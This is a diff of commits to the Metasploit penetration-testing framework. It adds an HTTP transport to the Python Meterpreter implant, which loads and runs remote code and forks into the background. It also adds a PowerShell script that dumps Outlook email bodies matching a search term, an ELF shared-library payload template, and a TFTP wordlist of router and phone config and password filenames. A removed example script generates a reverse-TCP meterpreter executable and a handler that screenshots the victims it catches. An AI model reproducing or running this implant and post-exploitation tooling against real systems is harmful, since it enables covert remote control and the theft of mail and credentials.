def send_packet_http(self, packet):
request = urllib.Request(HTTP_CONNECTION_URL, packet, self._http_request_headers)
try:
url_h = urllib.urlopen(request)
response = url_h.read()
except:
if (time.time() - self._http_last_seen) > HTTP_COMMUNICATION_TIMEOUT:
self.running = False
else:
self._http_last_seen = time.time()
def get_packet_tcp(self):
packet = None
if len(select.select([self.socket], [], [], 0.5)[0]):
packet = self.socket.recv(8)
if len(packet) != 8:
self.running = False
return None
pkt_length, pkt_type = struct.unpack('>II', packet)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(4096)
return packet
def send_packet_tcp(self, packet):
self.socket.send(packet)
def run(self): def run(self):
while self.running: while self.running:
if len(select.select([self.socket], [], [], 0.5)[0]): request = None
request = self.socket.recv(8) should_get_packet = self.communications_active or ((time.time() - self.communications_last) > 0.5)
if len(request) != 8: self.communications_active = False
break if should_get_packet:
req_length, req_type = struct.unpack('>II', request) request = self.get_packet()
req_length -= 8 if request:
request = bytes()
while len(request) < req_length:
request += self.socket.recv(4096)
response = self.create_response(request) response = self.create_response(request)
self.socket.send(response) self.send_packet(response)
else: else:
# iterate over the keys because self.channels could be modified if one is closed # iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys()) channel_ids = list(self.channels.keys())
@ -370,7 +534,7 @@ class PythonMeterpreter(object):
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0])) pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1]) pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt) self.send_packet(pkt)
if data: if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST) pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write') pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
@ -379,7 +543,7 @@ class PythonMeterpreter(object):
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data)) pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id()) pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt) self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id): def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id] del self.channels[channel_id]
@ -390,21 +554,25 @@ class PythonMeterpreter(object):
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id()) pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt) self.send_packet(pkt)
def _core_loadlib(self, request, response): def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE return ERROR_FAILURE
preloadlib_methods = list(self.extension_functions.keys())
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self} symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS) symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions) i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec')) i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = list(self.extension_functions.keys()) extension_name = self.last_registered_extension
new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
for method in new_methods: if extension_name:
response += tlv_pack(TLV_TYPE_METHOD, method) check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response return ERROR_SUCCESS, response
def _core_shutdown(self, request, response): def _core_shutdown(self, request, response):
@ -416,7 +584,7 @@ class PythonMeterpreter(object):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE) channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value'] handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions: if handler not in self.extension_functions:
return ERROR_FAILURE, response return error_result(NotImplementedError), response
handler = self.extension_functions[handler] handler = self.extension_functions[handler]
return handler(request, response) return handler(request, response)
@ -524,18 +692,16 @@ class PythonMeterpreter(object):
if handler_name in self.extension_functions: if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name] handler = self.extension_functions[handler_name]
try: try:
if DEBUGGING: self.debug_print('[*] running method ' + handler_name)
print('[*] running method ' + handler_name)
result, resp = handler(request, resp) result, resp = handler(request, resp)
except Exception: except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING: if DEBUGGING:
print('[-] method ' + handler_name + ' resulted in an error')
traceback.print_exc(file=sys.stderr) traceback.print_exc(file=sys.stderr)
result = ERROR_FAILURE result = error_result()
else: else:
if DEBUGGING: self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
print('[-] method ' + handler_name + ' was requested but does not exist') result = error_result(NotImplementedError)
result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result) resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp resp = struct.pack('>I', len(resp) + 4) + resp
return resp return resp
@ -546,5 +712,8 @@ if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
os.setsid() os.setsid()
except OSError: except OSError:
pass pass
met = PythonMeterpreter(s) if HTTP_CONNECTION_URL and has_urllib:
met = PythonMeterpreter()
else:
met = PythonMeterpreter(s)
met.run() met.run()

View File

@ -0,0 +1,47 @@
function GetSubfolders($root) {
$folders = @()
$folders += $root
foreach ($folder in $root.Folders) {
$folders += GetSubfolders($folder)
}
return $folders
}
function List-Folder {
Clear-host
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders
$folders = @()
foreach ($acc in $account) {
foreach ($folder in $acc.Folders) {
$folders += GetSubfolders($folder)
}
}
$folders | FT FolderPath
}
function Get-Emails {
param ([String]$searchTerm,[String]$Folder)
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders
$found = $false
foreach ($acc in $account) {
try {
$Email = $acc.Folders.Item($Folder).Items
$result = $Email | Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
if($result) {
$found = $true
$result | Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
}
} catch {
Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
}
}
if(-Not $found) {
Write-Host "Searchterm" $searchTerm "not found"
}
}

View File

@ -0,0 +1,95 @@
; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin
BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dd shdr - $$ ; e_shoff
dq 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_vaddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dq 0 ; sh_flags
dq dynsection ; sh_addr
dq dynsection ; sh_offset
dq dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq dynsz ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dq 0 ; sh_flags
dq strtab ; sh_addr
dq strtab ; sh_offset
dq strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 0 ; sh_addralign
dq 0 ; sh_entsize
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_HASH
dq 0x04
dq 0
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq strtabsz
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:

Binary file not shown.

View File

@ -1,5 +1,7 @@
000000000000-directory~.xml
000000000000.cfg 000000000000.cfg
000000000000-directory~.xml
000000000000-directory.xml
000000000000-phone.cfg
256T.CM 256T.CM
323tosip1_1.bin 323tosip1_1.bin
4601_02_readme_R2_3.txt 4601_02_readme_R2_3.txt
@ -18,26 +20,6 @@
46xxupgrade.scr 46xxupgrade.scr
6100-113.bin 6100-113.bin
7200-118.bin 7200-118.bin
CFE.bin
CP7912010301SIP050608A.sbin
OS79XX.TXT
P003-07-5-00.bin
P003-07-5-00.sbn
P0S3-07-5-00.bin
P0S3-07-5-00.loads
P0S3-07-5-00.sb2
RINGLIST.DAT
SEP000F34118045.cnf
SEP001562EA69E8.cnf
SEPDefault.cnf
SIP000F34118045.cnf
SIPDefault.cnf
SIPinsertMAChere.cnf
SoundPointIPLocalization
SoundPointIPWelcome.wav
TECfg.bin
TEImage.bin
XMLDefault.cnf.xml
a01d01b2_3.bin a01d01b2_3.bin
a02d01b2_3.bin a02d01b2_3.bin
a10d01b2_3.bin a10d01b2_3.bin
@ -46,98 +28,144 @@ a20d01b2_3.bin
a25d01a2_5.bin a25d01a2_5.bin
aastra.cfg aastra.cfg
active/system.ini active/system.ini
admin-config
admin.bin admin.bin
admin.cfg admin.cfg
administrator-config admin-confg
admin-config
administrator.bin administrator.bin
administrator.cfg administrator.cfg
administrator-config
applications.cfg
b01d01b2_3.bin b01d01b2_3.bin
b02d01b2_3.bin b02d01b2_3.bin
b10d01b2_3.bin b10d01b2_3.bin
b20d01a2_3.bin b20d01a2_3.bin
b20d01b2_3.bin b20d01b2_3.bin
b25d01a2_5.bin b25d01a2_5.bin
backup-config
backup.bin backup.bin
backup.cfg backup.cfg
backup-config
backup.img backup.img
bbla0_83.bin bbla0_83.bin
boot-config
boot.bin boot.bin
boot.cfg boot.cfg
boot.txt boot-config
bootrom.ld bootrom.ld
boot.txt
bridge-confg
CFE.bin
cfg.bin cfg.bin
cisco_util cisco-confg
cisconet.bin cisconet.bin
cisconet.cfg cisconet.cfg
ciscortr.bin ciscortr.bin
ciscortr.cfg ciscortr.cfg
code-config cisco_util
code.bin code.bin
code.cfg code.cfg
code-config
code.img code.img
config.bin config.bin
config.dump config.dump
config.ini config.ini
config.txt config.txt
CP7912010301SIP050608A.sbin
cvt01_2_3.bin cvt01_2_3.bin
cvt02_2_3.bin cvt02_2_3.bin
cvt02sw_2_3.bin cvt02sw_2_3.bin
debian.cfg debian.cfg
def06r1_8_3.bin def06r1_8_3.bin
def24r1_8_3.bin def24r1_8_3.bin
default-config
default.bin default.bin
default.cfg default.cfg
default-config
default.ini default.ini
device-config
device.bin device.bin
device.cfg device.cfg
device-config
dialplan.xml dialplan.xml
dump.dmc dump.dmc
firmware-config features.cfg
firewall-nat.cfg
firmware.bin firmware.bin
firmware.cfg firmware.cfg
firmware-config
firmware.img firmware.img
gateway-confg
gkdefault.cfg gkdefault.cfg
gw-confg
H323.cfg
ifIndex-table ifIndex-table
image-config
image.bin image.bin
image.cfg image.cfg
image-config
image.eim image.eim
image.out image.out
infrared.txt infrared.txt
local-config
local.bin local.bin
local.cfg local.cfg
main-config local-config
lync.cfg
main.bin main.bin
main.cfg main.cfg
main-config
main.img main.img
merlin2.pcm merlin2.pcm
myrouter-confg
n831r0.bin n831r0.bin
n84r1.bin n84r1.bin
nir4113.bin nir4113.bin
nir539R4.bin nir539R4.bin
OS79XX.TXT
P003-07-5-00.bin
P003-07-5-00.sbn
P003-08-11-00.bin
P003-08-11-00.sbn
P003-08-2-00.bin
P003-08-2-00.sbn
P003-08-3-00.bin
P003-08-3-00.sbn
P003-08-6-00.bin
P003-08-6-00.sbn
P003-08-9-00.bin
P003-08-9-00.sbn
P003-8-12-00.bin
P003-8-12-00.sbn
P0S3-07-5-00.bin
P0S3-07-5-00.loads
P0S3-07-5-00.sb2
P0S3-08-11-00.loads
P0S3-08-11-00.sb2
P0S3-08-2-00.loads
P0S3-08-2-00.sb2
P0S3-08-3-00.loads
P0S3-08-3-00.sb2
P0S3-08-6-00.loads
P0S3-08-6-00.sb2
P0S3-08-9-00.loads
P0S3-08-9-00.sb2
P0S3-8-12-00.loads
P0S3-8-12-00.sb2
passwd.bin passwd.bin
passwd.cfg passwd.cfg
passwd.ini passwd.ini
password.bin password.bin
password.cfg password.cfg
password.ini password.ini
persistent-data
persistent.bin persistent.bin
persistent.cfg persistent.cfg
persistent-data
phbook00e011010455.txt phbook00e011010455.txt
phone1.cfg phone1.cfg
polycomConfig.xsd
polycom.xml
prestige prestige
prestige.bin prestige.bin
prestige.cfg prestige.cfg
private-config
private.bin private.bin
private.cfg private.cfg
private-config
pstn.cfg
public.bin public.bin
public.cfg public.cfg
pwd.bin pwd.bin
@ -148,47 +176,73 @@ pxelinux.cfg/default
ram ram
ram-0 ram-0
ras ras
ras-0
ras-1
ras0 ras0
ras-0
ras1 ras1
ras-1
reg-advanced.cfg
reg-basic.cfg
region.cfg
release.xml release.xml
remote-config
remote.bin remote.bin
remote.cfg remote.cfg
remote-config
RINGLIST.DAT
rom rom
rom-0
rom-1
rom0 rom0
rom-0
rom1 rom1
router-confg rom-1
router.bin router.bin
router.cfg router.cfg
router-confg
s10d01b2_2.bin s10d01b2_2.bin
s20d01b2_2.bin s20d01b2_2.bin
secret-config
secret.bin secret.bin
secret.cfg secret.cfg
sip.cfg secret-config
sip.ld SEP000F34118045.cnf
sip.ver SEP001562EA69E8.cnf
sip_4602D01A.txt SEPDefault.cnf
sip_4602D02A.txt SIP000F34118045.cnf
sip_327.cfg
sip_4602ap1_1.ebin sip_4602ap1_1.ebin
sip_4602bt1_1.ebin sip_4602bt1_1.ebin
sip_4602D01A.txt
sip_4602D02A.txt
sip-basic.cfg
sip.cfg
sip-confg
SIPDefault.cnf
SIPinsertMAChere.cnf
sip-interop.cfg
sip.ld
sipto323_1_1.ebin sipto323_1_1.ebin
startup-config sip.ver
site.cfg
SoundPointIPLocalization
SoundPointIPWelcome.wav
startup.bin startup.bin
startup.cfg startup.cfg
startup-config
syncinfo.xml syncinfo.xml
system-config
system.bin system.bin
system.cfg system.cfg
system-config
system.img system.img
system.ini system.ini
TECfg.bin
TEImage.bin
test test
test.txt test.txt
text.txt
uip200_463enc.pac uip200_463enc.pac
uniden00e011030397.txt uniden00e011030397.txt
unidencom.txt unidencom.txt
v2210c.bin v2210c.bin
version.info
video.cfg
video-integration.cfg
vip-confg
voip-confg
XMLDefault.cnf.xml

View File

@ -11,7 +11,7 @@
# #
# It's strongly recommended to check this file into your version control system. # It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20140905031549) do ActiveRecord::Schema.define(:version => 20140922170030) do
create_table "api_keys", :force => true do |t| create_table "api_keys", :force => true do |t|
t.text "token" t.text "token"
@ -272,6 +272,7 @@ ActiveRecord::Schema.define(:version => 20140905031549) do
t.string "username", :null => false t.string "username", :null => false
t.datetime "created_at", :null => false t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false t.datetime "updated_at", :null => false
t.string "type", :null => false
end end
add_index "metasploit_credential_publics", ["username"], :name => "index_metasploit_credential_publics_on_username", :unique => true add_index "metasploit_credential_publics", ["username"], :name => "index_metasploit_credential_publics_on_username", :unique => true

34
documentation/README.md Normal file
View File

@ -0,0 +1,34 @@
# Metasploit Developer Documentation
*(last updated December 1, 2014)
Metasploit is actively supported by a community of hundreds of
contributors and thousands of users world-wide. As a result, the
accompanying documentation moves quite quickly.
The best source of documentation on Metasploit development is
https://github.com/rapid7/metasploit-framework/wiki. There are many
treasures there, such as:
* [Evading Antivirus](https://github.com/rapid7/metasploit-framework/wiki/Evading-Anti-Virus)
* [How Payloads Work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work)
* [How to use Datastore Options](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options)
* [How to write browser exploits with BES](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)
* [How to write a bruteforcer](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Msf%3A%3AAuxiliary%3A%3AAuthBrute-to-write-a-bruteforcer)
...and many, many more.
## API Documentation
If you are looking for API documentation, you may run `rake yard` to
generate a navigatable view of the comment documentation used throughout
Metasploit, or visit https://rapid7.github.io/metasploit-framework/api
for a recently generated online version.
## Contributing
If you would like to contribute to the documentation effort, please see
http://yardoc.org/ for details on how to write YARD-compatible comments,
and send us a [Pull Request](https://github.com/rapid7/metasploit-framework/pulls)
with your contribution.

View File

@ -1 +0,0 @@
rake yard

View File

@ -1,5 +0,0 @@
This directory contains 2.7 -> 3.0 compatibility information.
Exploit Modules: exploits.txt
Payload Modules: payloads.txt

View File

@ -1,161 +0,0 @@
Unfinished modules
==================
arkeia_agent_access
gnu_mailutils_imap4d
hpux_ftpd_preauth_list
iis_source_dumper
phpnuke_search_module
realvnc_41_bypass
solaris_snmpxdmid
sygate_policy_manager
uow_imap4_copy
uow_imap4_lsub - partially (linux/imap/imap_uw_lsub.rb)
wzdftpd_sitem
Completed modules
=================
afp_loginext exploit/osx/afp/loginext
aim_goaway exploit/windows/browser/aim_goaway
altn_webadmin exploit/windows/http/altn_webadmin
apache_chunked_win32 exploit/windows/http/apache_chunked
arkeia_type77_macos exploit/osx/arkeia/type77
arkeia_type77_win32 exploit/windows/arkeia/type77
awstats_configdir_exec exploit/unix/webapp/awstats_configdir_exec
barracuda_img_exec exploit/unix/webapp/barracuda_img_exec
backupexec_agent exploit/windows/backupexec/remote_agent
backupexec_dump auxiliary/admin/backupexec/dump
backupexec_ns exploit/windows/backupexec/name_service
backupexec_registry auxiliary/admin/backupexec/registry
badblue_ext_overflow exploit/windows/http/badblue_ext_overflow
bakbone_netvault_heap exploit/windows/misc/bakbone_netvault_heap
blackice_pam_icq exploit/windows/firewall/blackice_pam_icq
bluecoat_winproxy exploit/windows/proxy/bluecoat_winproxy_host
bomberclone_overflow_win32 exploit/windows/misc/bomberclone_overflow
cabrightstor_disco exploit/windows/brightstor/discovery_udp
cabrightstor_disco_servicepc exploit/windows/brightstor/discovery_tcp
cabrightstor_sqlagent exploit/windows/brightstor/sql_agent
cabrightstor_uniagent exploit/windows/brightstor/universal_agent
cacam_logsecurity_win32 exploit/windows/unicenter/cam_log_security
cacti_graphimage_exec exploit/unix/webapp/cacti_graphimage_exec
calicclnt_getconfig exploit/windows/license/calicclnt_getconfig
calicserv_getconfig exploit/windows/license/calicserv_getconfig
cesarftp_mkd exploit/windows/ftp/cesarftp_mkd
distcc_exec exploit/unix/misc/distcc_exec
edirectory_imonitor exploit/windows/http/edirectory_imonitor
edirectory_imonitor2 exploit/windows/http/edirectory_host
eiq_license exploit/windows/misc/eiqnetworks_esa
eudora_imap exploit/windows/imap/eudora_list
exchange2000_xexch50 exploit/windows/smtp/ms03_046_exchange2000_xexch50
firefox_queryinterface_linux exploit/multi/browser/firefox_queryinterface
firefox_queryinterface_osx exploit/multi/browser/firefox_queryinterface
freeftpd_user exploit/windows/ftp/freeftpd_user
freesshd_key_exchange exploit/windows/ssh/freesshd_key_exchange
freeftpd_key_exchange exploit/windows/ftp/freeftpd_key_exchange
futuresoft_tftpd exploit/windows/tftp/futuresoft_transfermode
globalscapeftp_user_input exploit/windows/ftp/globalscapeftp_input
google_proxystylesheet_exec exploit/unix/webapp/google_proxystylesheet_exec
hpux_lpd_exec exploit/hpux/lpd/cleanup_exec
ia_webmail exploit/windows/http/ia_webmail
icecast_header exploit/windows/http/icecast_header
ie_objecttype exploit/windows/browser/ms03_020_ie_objecttype
ie_vml_rectfill exploit/windows/browser/ms06_055_vml_method
ie_webview_setslice exploit/windows/browser/ms06_057_webview_setslice
ie_xp_pfv_metafile exploit/windows/browser/ms06_001_wmf_setabortproc
ie_createtextrange exploit/windows/browser/ms06_013_createtextrange
ie_iscomponentinstalled exploit/windows/browser/ie_iscomponentinstalled
ie_createobject exploit/windows/browser/ie_createobject
iis40_htr exploit/windows/iis/ms02_018_htr
iis50_printer_overflow exploit/windows/iis/ms01_023_printer
iis50_webdav_ntdll exploit/windows/iis/ms03_007_ntdll_webdav
iis_fp30reg_chunked exploit/windows/isapi/fp30reg_chunked
iis_nsiislog_post exploit/windows/isapi/nsiislog_post
iis_w3who_overflow exploit/windows/isapi/w3who_query
imail_imap_delete exploit/windows/imap/imail_delete
imail_ldap exploit/windows/ldap/imail_thc
irix_lpsched_exec exploit/irix/lpd/tagprinter_exec
kerio_auth exploit/windows/firewall/kerio_auth
lsass_ms04_011 exploit/windows/smb/ms04_011_lsass
mailenable_auth_header exploit/windows/http/mailenable_auth_header
mailenable_imap exploit/windows/imap/mailenable_status
mailenable_imap_w3c exploit/windows/imap/mailenable_w3c_select
maxdb_webdbm_get_overflow exploit/windows/http/maxdb_webdbm_get_overflow
mcafee_epolicy_source exploit/windows/http/mcafee_epolicy_source
mdaemon_imap_cram_md5 exploit/windows/imap/mdaemon_cram_md5
mercantec_softcart exploit/bsdi/softcart/mercantec_softcart
mercur_imap_select_overflow exploit/windows/imap/mercur_imap_select_overflow
mercury_imap exploit/windows/imap/mercury_rename
minishare_get_overflow exploit/windows/http/minishare_get_overflow
mozilla_compareto exploit/multi/browser/mozilla_compareto
ms05_030_nntp exploit/windows/nntp/ms05_030_nntp
ms05_039_pnp exploit/windows/smb/ms05_039_pnp
msasn1_ms04_007_killbill exploit/windows/smb/ms04_007_killbill
msmq_deleteobject_ms05_017 exploit/windows/dcerpc/ms05_017_msmq
msrpc_dcom_ms03_026 exploit/windows/dcerpc/ms03_026_dcom
mssql2000_preauthentication exploit/windows/mssql/ms02_056_hello
mssql2000_resolution exploit/windows/mssql/ms02_039_slammer
netapi_ms06_040 exploit/windows/smb/ms06_040_netapi
netterm_netftpd_user_overflow exploit/windows/ftp/netterm_netftpd_user
niprint_lpd exploit/windows/lpd/niprint
novell_messenger_acceptlang exploit/windows/http/novell_messenger_acceptlang
openview_connectednodes_exec exploit/unix/webapp/openview_connectednodes_exec
openview_omniback_exec exploit/unix/misc/openview_omniback_exec
oracle9i_xdb_ftp exploit/windows/ftp/oracle9i_xdb_ftp_unlock
oracle9i_xdb_ftp_pass exploit/windows/ftp/oracle9i_xdb_ftp_pass
oracle9i_xdb_http exploit/windows/http/oracle9i_xdb_pass
pajax_remote_exec exploit/unix/webapp/pajax_remote_exec
payload_handler exploit/multi/handler
peercast_url_linux exploit/linux/http/peercast_url
peercast_url_win32 exploit/windows/http/peercast_url
php_wordpress_lastpost exploit/unix/webapp/php_wordpress_lastpost
php_vbulletin_template exploit/unix/webapp/php_vbulletin_template
php_xmlrpc_eval exploit/unix/webapp/php_xmlrpc_eval
phpbb_highlight exploit/unix/webapp/phpbb_highlight
poptop_negative_read exploit/linux/pptp/poptop_negative_read
privatewire_gateway_win32 exploit/windows/http/privatewire_gateway
putty_ssh exploit/windows/ssh/putty_msg_debug
realserver_describe_linux exploit/multi/realserver/describe
realvnc_client exploit/windows/vnc/realvnc_client
rras_ms06_025 exploit/windows/smb/ms06_025_rras
rras_ms06_025_rasman exploit/windows/smb/ms06_025_rasmans_reg
rsa_iiswebagent_redirect exploit/windows/isapi/rsa_webagent_redirect
safari_safefiles_exec exploit/osx/browser/safari_metadata_archive
samba_nttrans exploit/multi/samba/nttrans
samba_trans2open_osx exploit/osx/samba/trans2open
samba_trans2open_solsparc exploit/solaris/samba/trans2open
sambar6_search_results exploit/windows/http/sambar6_search_results
smb_sniffer auxiliary/server/capture/smb
seattlelab_mail_55 exploit/windows/pop3/seattelab_pass
securecrt_ssh1 exploit/windows/ssh/securecrt_ssh1
sentinel_lm7_overflow exploit/windows/license/sentinel_lm7_udp
servu_mdtm_overflow exploit/windows/ftp/servu_mdtm
shixxnote_font exploit/windows/misc/shixxnote_font
shoutcast_format_win32 exploit/windows/http/shoutcast_format
slimftpd_list_concat exploit/windows/ftp/slimftpd_list_concat
solaris_dtspcd_noir exploit/solaris/dtspcd/heap_noir
solaris_lpd_exec exploit/solaris/lpd/sendmail_exec
solaris_lpd_unlink auxiliary/dos/solaris/lpd/cascade_delete
solaris_sadmind_exec exploit/solaris/sunrpc/solaris_sadmind_exec
solaris_ttyprompt exploit/solaris/telnet/ttyprompt
sphpblog_file_upload exploit/unix/webapp/sphpblog_file_upload
squid_ntlm_authenticate exploit/linux/proxy/squid_ntlm_authenticate
svnserve_date exploit/multi/svn/svnserve_date
sybase_easerver exploit/windows/http/sybase_easerver
tftpd32_long_filename exploit/windows/tftp/tftpd32_long_filename
trackercam_phparg_overflow exploit/windows/http/trackercam_phparg_overflow
ultravnc_client exploit/windows/vnc/ultravnc_client
ut2004_secure_linux exploit/linux/games/ut2004_secure
ut2004_secure_win32 exploit/windows/games/ut2004_secure
warftpd_165_user exploit/windows/ftp/warftpd_165_user
warftpd_165_pass exploit/windows/ftp/warftpd_165_pass
webstar_ftp_user exploit/osx/ftp/webstar_ftp_user
winamp_playlist_unc exploit/windows/browser/winamp_playlist_unc
windows_ssl_pct exploit/windows/ssl/ms04_011_pct
wins_ms04_045 exploit/windows/wins/ms04_045_wins
wmailserver_smtp exploit/windows/smtp/wmailserver
wsftp_server_503_mkd exploit/windows/ftp/wsftp_server_503_mkd
ypops_smtp exploit/windows/smtp/ypops_overflow1
zenworks_desktop_agent exploit/windows/novell/zenworks_desktop_agent

View File

@ -1,49 +0,0 @@
#
# Quick RC script to demonstrate the Ruby blocks in RC files
#
#
# Generate a corresponding EXE using msfpayload (change 192.168.0.228 to your IP):
# $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.228 LPORT=4444 X > reverse.exe
#
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.228
set ExitOnSession false
exploit -j
# The first sleep below is not necessary, but makes the output cleaner
<ruby>
sleep(1)
print_status("Waiting on an incoming sessions...")
while (true)
framework.sessions.each_pair do |sid,s|
thost = s.session_host
# Ensure that stdapi has been loaded before running
if s.ext.aliases['stdapi']
print_status("Screenshotting session #{sid} #{thost}...")
s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85")
print_status("Closing session #{sid} #{thost}...")
s.kill
else
print_status("Session #{sid} #{thost} active, but not yet configured")
end
end
sleep(1)
end
print_status("All done")
</ruby>
# Kill all open sessions
sessions -K
# Exit the console (optional)
exit

View File

@ -1,338 +0,0 @@
Using the Opcode Database CLI (msfopcode)
The 3.0 version of the Metasploit Framework comes with a command line
interface to the Metasploit Opcode Database. This can be used instead
of the web-based wizard to easily search for portable opcode
addresses. The interface is provided through the msfopcode command
which is found in the root directory of the installation. This
interface is merely a front-end to a the
Rex::Exploitation::OpcodeDb::Client class interface that interfaces
with a HTTP-based XML protocol running on the Metasploit.com
web-server.
The interface itself provides a simplified interface to some of the
different aspects of the opcode database. When running the command
with no arguments, the following output is shown:
$ ./msfopcode
Usage: msfopcode command
SUPPORTED COMMANDS
stats Display database statistics
locales Display supported locales
metatypes Display supported opcode meta types (Ex: jmp reg)
groups Display supported opcode groups (Ex: esp => eip)
types Display supported opcode types (Ex: jmp esp)
platforms Display supported platforms
modules Display information about specific modules
search Search for opcodes given a set of criteria
The purpose of the stats command is to show the current database
statistics, such as the number of opcodes and modules currently
indexed by the database and the last time the database was updated.
The output to this command looks something like this:
$ ./msfopcode stats
Last Updated : Sat Sep 03 01:32:00 CDT 2005
Number of Opcodes : 12177419
Number of Opcode Types : 320
Number of Platforms : 14
Number of Architectures : 1
Number of Modules : 17683
Number of Module Segments: 71457
Number of Module Imports : 2065492
Number of Module Exports : 927637
The locales command lists the locales that are currently supported by
the database. In the future, more locales will be indexed to provided
a more complete view of opcode portability.
$ ./msfopcode locales
English
French
The metatypes command lists the opcode meta types currently supported
